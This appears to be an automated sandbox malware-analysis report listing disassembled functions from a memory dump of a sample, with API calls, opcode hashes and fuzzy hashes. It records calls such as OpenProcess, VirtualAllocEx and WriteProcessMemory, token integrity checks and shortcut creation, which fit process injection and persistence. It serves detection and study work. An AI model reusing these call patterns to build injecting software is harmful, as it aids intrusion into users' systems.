                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 842720411-0
                                                                                                                • Opcode ID: 39c0acf48ffd2d217292602b82d2984c79839ad618ae74312aa33e7988bf87dd
                                                                                                                • Instruction ID: fe920edb0c0f983746e3261eb7ad5e15ca036e9c911e48c8ea9ac2375aac370b
                                                                                                                • Opcode Fuzzy Hash: 39c0acf48ffd2d217292602b82d2984c79839ad618ae74312aa33e7988bf87dd
                                                                                                                • Instruction Fuzzy Hash: DC016DB5212209BFDB119FA5EC8CE6B3BADEF8A765B100029F645C2190DB718C54DF60
                                                                                                                Function 00248355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00248371
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0024837F
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00248387
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00248391
                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002483CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                • Opcode ID: b3d0a6f3ecdaef2cc1ebcff70942e387f319630ba3a63dc065f6fff7704aba9d
                                                                                                                • Instruction ID: c466cd3d5b1d63ae539c0f6588b5eb0496c483454f42fc523f3004f6ccc54fbd
                                                                                                                • Opcode Fuzzy Hash: b3d0a6f3ecdaef2cc1ebcff70942e387f319630ba3a63dc065f6fff7704aba9d
                                                                                                                • Instruction Fuzzy Hash: 63012935D2161ADBDF04AFE8ED4CAEEBB78FF08B01F000095E945B2190DF7495649BA1
                                                                                                                Function 0023A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32 ref: 0023A874
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 0023A88F
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 0023A89D
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0023A8AD
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 0023A8B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                • Opcode ID: abf6cdc1f060da26b7caf5e90df9ccc8bde407937f460e05150c6f39ca6342df
                                                                                                                • Instruction ID: 82e68f8a63c2ed6a30ca2ea4662fe2ab7fefba501074a750ab00feec421849f2
                                                                                                                • Opcode Fuzzy Hash: abf6cdc1f060da26b7caf5e90df9ccc8bde407937f460e05150c6f39ca6342df
                                                                                                                • Instruction Fuzzy Hash: 05018BBA612205AFEB105F68EC88BAABBEDEF443A1F104034B941D2250D770DD568BA1
                                                                                                                Function 0023B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0023B7A5
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0023B7AF
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0023B7BE
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0023B7C5
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0023B7DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 0fe40ea9e37e590790a4f42123a3a058d1ad0b19f3c6c9d12466b393bb842d86
                                                                                                                • Instruction ID: 2ce7247a0ad6ba1e4c3fec1c344e935430137965c4f91fe6034cb7beacdb2155
                                                                                                                • Opcode Fuzzy Hash: 0fe40ea9e37e590790a4f42123a3a058d1ad0b19f3c6c9d12466b393bb842d86
                                                                                                                • Instruction Fuzzy Hash: 18F0AF7A2413056FEB111FA4BC8CE677BACFF86B55F100019FA04CB190DB619C158B60
                                                                                                                Function 0023B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0023B806
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0023B810
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0023B81F
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0023B826
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0023B83C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 42990bbddb40a2b2abdb575b85f696b01cbf91a77deaf5c4f902b7170a0c155d
                                                                                                                • Instruction ID: 04c51815d9eb1419e6d35f9c310708773eb27c75be2b9beffde8c13e3eadb823
                                                                                                                • Opcode Fuzzy Hash: 42990bbddb40a2b2abdb575b85f696b01cbf91a77deaf5c4f902b7170a0c155d
                                                                                                                • Instruction Fuzzy Hash: 53F03C792112056FEB221FA5FC8CE673B6CFF46764F100029FA45C6190DB6198568B60
                                                                                                                Function 0023FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0023FA8F
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0023FAA6
                                                                                                                • MessageBeep.USER32(00000000), ref: 0023FABE
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 0023FADA
                                                                                                                • EndDialog.USER32(?,00000001), ref: 0023FAF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: 3d948b5f3cadcc5ed6b7cd4cfd1abefe74d531713bffc7291ef92304b15c5d05
                                                                                                                • Instruction ID: d464afcd956c079e896dad690ece0faa34c16fadfc6748392b0325f3bf785638
                                                                                                                • Opcode Fuzzy Hash: 3d948b5f3cadcc5ed6b7cd4cfd1abefe74d531713bffc7291ef92304b15c5d05
                                                                                                                • Instruction Fuzzy Hash: BD018175910705ABEB60AF20FE4EB9677B8FB00B09F04016AB187A54E1DBF4A9588B40
                                                                                                                Function 0021B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EndPath.GDI32(?), ref: 0021B526
                                                                                                                • StrokeAndFillPath.GDI32(?,?,0027F583,00000000,?), ref: 0021B542
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0021B555
                                                                                                                • DeleteObject.GDI32 ref: 0021B568
                                                                                                                • StrokePath.GDI32(?), ref: 0021B583
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: eb93e0a1b9718b40f843faa4e5c7203515b2ebabb6ac2e669df7ca67ddc009c0
                                                                                                                • Instruction ID: d9067a633a7046ee471e1fffb38e35280fe8f8fb96706644f2cc1071238d93f9
                                                                                                                • Opcode Fuzzy Hash: eb93e0a1b9718b40f843faa4e5c7203515b2ebabb6ac2e669df7ca67ddc009c0
                                                                                                                • Instruction Fuzzy Hash: C2F0193401A605ABEB126F29FC0DB943FF2AB12322F448314E4A9840F1C73199B9DF00
                                                                                                                Function 0025F79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: dE+
                                                                                                                • API String ID: 0-2435709166
                                                                                                                • Opcode ID: d45c3b283abdb6cf98b869659ba40ae5833dc744b03e6dc58319b254e39c98ed
                                                                                                                • Instruction ID: 8711ee6bedbd9a9cdb2b0ff575741bd32cf918e4ddf93797f8937be765a8dde0
                                                                                                                • Opcode Fuzzy Hash: d45c3b283abdb6cf98b869659ba40ae5833dc744b03e6dc58319b254e39c98ed
                                                                                                                • Instruction Fuzzy Hash: F2F189716187019FC714DF28C984B5AB7E1FF88315F10892EF9998B292DB70E959CF82
                                                                                                                Function 0024FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0024FAB2
                                                                                                                • CoCreateInstance.OLE32(0028DA7C,00000000,00000001,0028D8EC,?), ref: 0024FACA
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • CoUninitialize.OLE32 ref: 0024FD2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2683427295-24824748
                                                                                                                • Opcode ID: cdc9c28416ffd427be37fcb824596c2922e33b409292c3d789de0ee970bb98bf
                                                                                                                • Instruction ID: fab8668929b0e14cafccd25e5f4a4a7e9ac40feeb37e406f5b97653f2174f8bd
                                                                                                                • Opcode Fuzzy Hash: cdc9c28416ffd427be37fcb824596c2922e33b409292c3d789de0ee970bb98bf
                                                                                                                • Instruction Fuzzy Hash: D0A16AB1614301AFD304EF64C891EABB7EDAF98704F40491DF19587192EB70EA59CFA2
                                                                                                                Function 0024EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002478AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 002478CB
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0024F04D
                                                                                                                • CoCreateInstance.OLE32(0028DA7C,00000000,00000001,0028D8EC,?), ref: 0024F066
                                                                                                                • CoUninitialize.OLE32 ref: 0024F083
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2126378814-24824748
                                                                                                                • Opcode ID: fac9535ffd02027c512f1c638d5e51534700461686bc154b9b05c8593a06ff7f
                                                                                                                • Instruction ID: 0a83da86cbb53df1a790a82184ccde7d030beffc009bbc8e79ac063dd6a4ef81
                                                                                                                • Opcode Fuzzy Hash: fac9535ffd02027c512f1c638d5e51534700461686bc154b9b05c8593a06ff7f
                                                                                                                • Instruction Fuzzy Hash: 45A165756243029FCB14DF14C984D5ABBE5BF88320F148998F89A9B3A2CB31ED55CF91
                                                                                                                Function 00223EED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00223F7D
                                                                                                                  • Part of subcall function 0022EE80: __87except.LIBCMT ref: 0022EEBB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandling__87except__start
                                                                                                                • String ID: pow
                                                                                                                • API String ID: 2905807303-2276729525
                                                                                                                • Opcode ID: 72731f38b71f8f6db04932f7f56dbd2aa563aabf1617bc03f4d42e119fe5f828
                                                                                                                • Instruction ID: 45ce28cc1990e0f2c36ab365f965527e8952bfdd2dc5f66bc009286ceb18f6d0
                                                                                                                • Opcode Fuzzy Hash: 72731f38b71f8f6db04932f7f56dbd2aa563aabf1617bc03f4d42e119fe5f828
                                                                                                                • Instruction Fuzzy Hash: 39517020D38223B6DB15FFD4FB4137A3BB49B00710F204D29E495455E9EB788EF8AA42
                                                                                                                Function 0021DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #$+
                                                                                                                • API String ID: 0-2552117581
                                                                                                                • Opcode ID: dfc29106a6aeadafc547dd8a7d6b568cb3ce1a67502c3d649bbb7a59a27fb74e
                                                                                                                • Instruction ID: e3945d813cbce2c8786725d75b54fd10f42399c7a119da04ff6df6b8da285cd2
                                                                                                                • Opcode Fuzzy Hash: dfc29106a6aeadafc547dd8a7d6b568cb3ce1a67502c3d649bbb7a59a27fb74e
                                                                                                                • Instruction Fuzzy Hash: C2513335124256CFDF11EF68C444AFA3BA0AF26314F248051FC569B2D1D7749EB2CB21
                                                                                                                Function 0024503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0029DC40,?,0000000F,0000000C,00000016,0029DC40,?), ref: 0024507B
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                  • Part of subcall function 0020B8A7: _memmove.LIBCMT ref: 0020B8FB
                                                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002450FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                • String ID: REMOVE$THIS
                                                                                                                • API String ID: 2528338962-776492005
                                                                                                                • Opcode ID: 3843d76d62cc05f726cacbe768cbcd3c954159deffe7f8cc3a5b3f382e9d3bdc
                                                                                                                • Instruction ID: 639b3922de8b25d525bf5e53e9464689dbda19ba148e344e1da13fd29a8229f1
                                                                                                                • Opcode Fuzzy Hash: 3843d76d62cc05f726cacbe768cbcd3c954159deffe7f8cc3a5b3f382e9d3bdc
                                                                                                                • Instruction Fuzzy Hash: FA419334A2061A9FCF05DF54C881AAEB7B5BF48304F048469E89AAB393D7349D61CF50
                                                                                                                Function 0023CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00244D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0023C9FE,?,?,00000034,00000800,?,00000034), ref: 00244D6B
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0023CFC9
                                                                                                                  • Part of subcall function 00244D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0023CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00244D36
                                                                                                                  • Part of subcall function 00244C65: GetWindowThreadProcessId.USER32(?,?), ref: 00244C90
                                                                                                                  • Part of subcall function 00244C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0023C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00244CA0
                                                                                                                  • Part of subcall function 00244C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0023C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00244CB6
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0023D036
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0023D083
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                • Opcode ID: 9c274e77411ea86cf81147ec1c95f0e4c3da0132f016cd870a6b3f1dc159f6ba
                                                                                                                • Instruction ID: 82cb37e1ae39113245ffa8526578665391211e63efe91214c91638125ceca2c5
                                                                                                                • Opcode Fuzzy Hash: 9c274e77411ea86cf81147ec1c95f0e4c3da0132f016cd870a6b3f1dc159f6ba
                                                                                                                • Instruction Fuzzy Hash: F5416DB6901218AFDB14EFA4DD85FDEB778EF09700F008095EA45BB181DA706E59CF60
                                                                                                                Function 0026A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0029DBF0,00000000,?,?,?,?), ref: 0026A4E6
                                                                                                                • GetWindowLongW.USER32 ref: 0026A503
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0026A513
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
